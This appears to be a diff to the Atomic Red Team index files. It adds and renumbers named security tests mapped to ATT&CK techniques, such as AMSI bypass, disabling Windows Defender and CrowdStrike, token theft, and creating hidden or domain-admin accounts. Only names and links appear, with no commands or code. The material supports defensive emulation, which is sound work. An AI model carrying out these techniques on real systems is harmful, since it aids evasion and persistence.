+discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
 discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
 discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
@@ -394,6 +409,7 @@ collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6
 collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
+collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
 execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -100,7 +100,8 @@
   - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
   - Atomic Test #1: Plist Modification [macos]
-- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
+  - Atomic Test #1: Add Port Monitor persistence in Registry [windows]
 - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
   - Atomic Test #1: Append malicious start-process cmdlet [windows]
@@ -155,7 +156,9 @@
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1134.001 Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
+  - Atomic Test #1: Named pipe client impersonation [windows]
+  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
 - [T1546.005 Trap](../../T1546.005/T1546.005.md)
   - Atomic Test #1: Trap [macos, linux]
 - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -230,7 +233,9 @@
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
-- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
+  - Atomic Test #1: Create a new Windows domain admin user [windows]
+  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.014 Emond](../../T1546.014/T1546.014.md)
@@ -275,7 +280,8 @@
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1137.002 Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1137.002 Office Test](../../T1137.002/T1137.002.md)
+  - Atomic Test #1: Office Apllication Startup Test Persistence [windows]
 - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -287,7 +293,8 @@
 - [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
   - Atomic Test #1: Plist Modification [macos]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
+  - Atomic Test #1: Add Port Monitor persistence in Registry [windows]
 - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
   - Atomic Test #1: Append malicious start-process cmdlet [windows]
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -524,7 +531,8 @@
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
   - Atomic Test #2: Certutil Rename and Decode [windows]
-- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1006 Direct Volume Access](../../T1006/T1006.md)
+  - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
 - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
   - Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
   - Atomic Test #2: Kill Event Log Service Threads [windows]
@@ -544,22 +552,23 @@
   - Atomic Test #5: Disable Carbon Black Response [macos]
   - Atomic Test #6: Disable LittleSnitch [macos]
   - Atomic Test #7: Disable OpenDNS Umbrella [macos]
-  - Atomic Test #8: Stop and unload Crowdstrike Falcon on macOS [macos]
-  - Atomic Test #9: Unload Sysmon Filter Driver [windows]
-  - Atomic Test #10: Uninstall Sysmon [windows]
-  - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
-  - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
-  - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
-  - Atomic Test #14: Tamper with Windows Defender ATP PowerShell [windows]
-  - Atomic Test #15: Tamper with Windows Defender Command Prompt [windows]
-  - Atomic Test #16: Tamper with Windows Defender Registry [windows]
-  - Atomic Test #17: Disable Microsoft Office Security Features [windows]
-  - Atomic Test #18: Remove Windows Defender Definition Files [windows]
-  - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows]
-  - Atomic Test #20: Uninstall Crowdstrike Falcon on Windows [windows]
-  - Atomic Test #21: Tamper with Windows Defender Evade Scanning -Folder [windows]
-  - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Extension [windows]
-  - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Process [windows]
+  - Atomic Test #8: Disable macOS Gatekeeper [macos]
+  - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
+  - Atomic Test #10: Unload Sysmon Filter Driver [windows]
+  - Atomic Test #11: Uninstall Sysmon [windows]
+  - Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
+  - Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
+  - Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
+  - Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
+  - Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
+  - Atomic Test #17: Tamper with Windows Defender Registry [windows]
+  - Atomic Test #18: Disable Microsoft Office Security Features [windows]
+  - Atomic Test #19: Remove Windows Defender Definition Files [windows]
+  - Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
+  - Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
+  - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
+  - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
+  - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -598,19 +607,23 @@
   - Atomic Test #6: Hide a Directory [macos]
   - Atomic Test #7: Show all hidden files [macos]
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
-  - Atomic Test #1: Hidden Users [macos]
+  - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
+  - Atomic Test #2: Create Hidden User using IsHidden option [macos]
 - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
   - Atomic Test #1: Hidden Window [windows]
 - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
+  - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
+  - Atomic Test #2: Lgging Configuration Changes on Linux Host [linux]
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1070 Indicator Removal on Host](../../T1070/T1070.md)
   - Atomic Test #1: Indicator Removal using FSUtil [windows]
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
   - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
+  - Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
 - [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
   - Atomic Test #1: Install root CA on CentOS/RHEL [linux]
   - Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
@@ -644,7 +657,9 @@
 - [T1127.001 MSBuild](../../T1127.001/T1127.001.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
+  - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
+  - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -782,7 +797,10 @@
   - Atomic Test #1: Sudo usage [macos, linux]
   - Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
   - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
-- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
+  - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
+  - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
+  - Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
 - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -797,7 +815,9 @@
   - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
   - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
   - Atomic Test #8: Windows - Timestomp a File [windows]
-- T1134.001 Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
+  - Atomic Test #1: Named pipe client impersonation [windows]
+  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -969,14 +989,18 @@
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
-  - Atomic Test #3: Security Software Discovery - ps [linux, macos]
-  - Atomic Test #4: Security Software Discovery - Sysmon Service [windows]
-  - Atomic Test #5: Security Software Discovery - AV Discovery via WMI [windows]
+  - Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
+  - Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
+  - Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
+  - Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
 - [T1518 Software Discovery](../../T1518/T1518.md)
   - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
   - Atomic Test #2: Applications Installed [windows]
   - Atomic Test #3: Find and Display Safari Browser Version [macos]
-- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
+  - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
+  - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
+  - Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
   - Atomic Test #1: System Information Discovery [windows]
   - Atomic Test #2: System Information Discovery [macos]
@@ -992,6 +1016,7 @@
   - Atomic Test #3: System Network Configuration Discovery [macos, linux]
   - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
   - Atomic Test #5: List Open Egress Ports [windows]
+  - Atomic Test #6: List macOS Firewall Rules [macos]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
   - Atomic Test #1: System Network Connections Discovery [windows]
   - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
@@ -1261,6 +1286,7 @@
   - Atomic Test #2: Screencapture (silent) [macos]
   - Atomic Test #3: X Windows Capture [linux]
   - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
+  - Atomic Test #5: Windows Screencapture [windows]
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -194,7 +194,9 @@
 - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
+  - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
+  - Atomic Test #2: Lgging Configuration Changes on Linux Host [linux]
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
@@ -248,7 +250,8 @@
   - Atomic Test #1: Sudo usage [macos, linux]
   - Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
   - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
-- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
+  - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
   - Atomic Test #1: Set a file's access timestamp [linux, macos]
@@ -342,9 +345,10 @@
   - Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
   - Atomic Test #7: Remote System Discovery - sweep [linux, macos]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
-  - Atomic Test #3: Security Software Discovery - ps [linux, macos]
+  - Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
 - T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
+  - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
   - Atomic Test #3: List OS Information [linux, macos]
   - Atomic Test #4: Linux VM Check via Hardware [linux]

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -136,7 +136,8 @@
   - Atomic Test #5: Disable Carbon Black Response [macos]
   - Atomic Test #6: Disable LittleSnitch [macos]
   - Atomic Test #7: Disable OpenDNS Umbrella [macos]
-  - Atomic Test #8: Stop and unload Crowdstrike Falcon on macOS [macos]
+  - Atomic Test #8: Disable macOS Gatekeeper [macos]
+  - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -160,7 +161,8 @@
   - Atomic Test #6: Hide a Directory [macos]
   - Atomic Test #7: Show all hidden files [macos]
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
-  - Atomic Test #1: Hidden Users [macos]
+  - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
+  - Atomic Test #2: Create Hidden User using IsHidden option [macos]
 - T1564.003 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -212,7 +214,8 @@
   - Atomic Test #1: Sudo usage [macos, linux]
   - Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
   - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
-- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
+  - Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
   - Atomic Test #1: Set a file's access timestamp [linux, macos]
@@ -293,16 +296,18 @@
   - Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
   - Atomic Test #7: Remote System Discovery - sweep [linux, macos]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
-  - Atomic Test #3: Security Software Discovery - ps [linux, macos]
+  - Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
 - [T1518 Software Discovery](../../T1518/T1518.md)
   - Atomic Test #3: Find and Display Safari Browser Version [macos]
-- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
+  - Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
   - Atomic Test #2: System Information Discovery [macos]
   - Atomic Test #3: List OS Information [linux, macos]
   - Atomic Test #7: Hostname Discovery [linux, macos]
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
   - Atomic Test #3: System Network Configuration Discovery [macos, linux]
+  - Atomic Test #6: List macOS Firewall Rules [macos]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
   - Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -71,7 +71,8 @@
 - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
   - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
-- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
+  - Atomic Test #1: Add Port Monitor persistence in Registry [windows]
 - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
   - Atomic Test #1: Append malicious start-process cmdlet [windows]
@@ -107,7 +108,9 @@
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1134.001 Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
+  - Atomic Test #1: Named pipe client impersonation [windows]
+  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
   - Atomic Test #1: Persistence via WMI Event Subscription [windows]
@@ -175,7 +178,8 @@
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
   - Atomic Test #2: Certutil Rename and Decode [windows]
-- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1006 Direct Volume Access](../../T1006/T1006.md)
+  - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
 - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
   - Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
   - Atomic Test #2: Kill Event Log Service Threads [windows]
@@ -186,21 +190,21 @@
   - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
   - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
-  - Atomic Test #9: Unload Sysmon Filter Driver [windows]
-  - Atomic Test #10: Uninstall Sysmon [windows]
-  - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
-  - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
-  - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
-  - Atomic Test #14: Tamper with Windows Defender ATP PowerShell [windows]
-  - Atomic Test #15: Tamper with Windows Defender Command Prompt [windows]
-  - Atomic Test #16: Tamper with Windows Defender Registry [windows]
-  - Atomic Test #17: Disable Microsoft Office Security Features [windows]
-  - Atomic Test #18: Remove Windows Defender Definition Files [windows]
-  - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows]
-  - Atomic Test #20: Uninstall Crowdstrike Falcon on Windows [windows]
-  - Atomic Test #21: Tamper with Windows Defender Evade Scanning -Folder [windows]
-  - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Extension [windows]
-  - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Process [windows]
+  - Atomic Test #10: Unload Sysmon Filter Driver [windows]
+  - Atomic Test #11: Uninstall Sysmon [windows]
+  - Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
+  - Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
+  - Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
+  - Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
+  - Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
+  - Atomic Test #17: Tamper with Windows Defender Registry [windows]
+  - Atomic Test #18: Disable Microsoft Office Security Features [windows]
+  - Atomic Test #19: Remove Windows Defender Definition Files [windows]
+  - Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
+  - Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
+  - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
+  - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
+  - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -234,6 +238,7 @@
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
   - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
+  - Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
 - [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
   - Atomic Test #4: Install root CA on Windows [windows]
 - [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
@@ -250,7 +255,9 @@
 - [T1127.001 MSBuild](../../T1127.001/T1127.001.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
+  - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
+  - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -365,7 +372,8 @@
 - T1027.002 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
+  - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
 - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -376,7 +384,9 @@
   - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
   - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
   - Atomic Test #8: Windows - Timestomp a File [windows]
-- T1134.001 Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
+  - Atomic Test #1: Named pipe client impersonation [windows]
+  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -441,7 +451,9 @@
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
-- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
+  - Atomic Test #1: Create a new Windows domain admin user [windows]
+  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -465,7 +477,8 @@
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
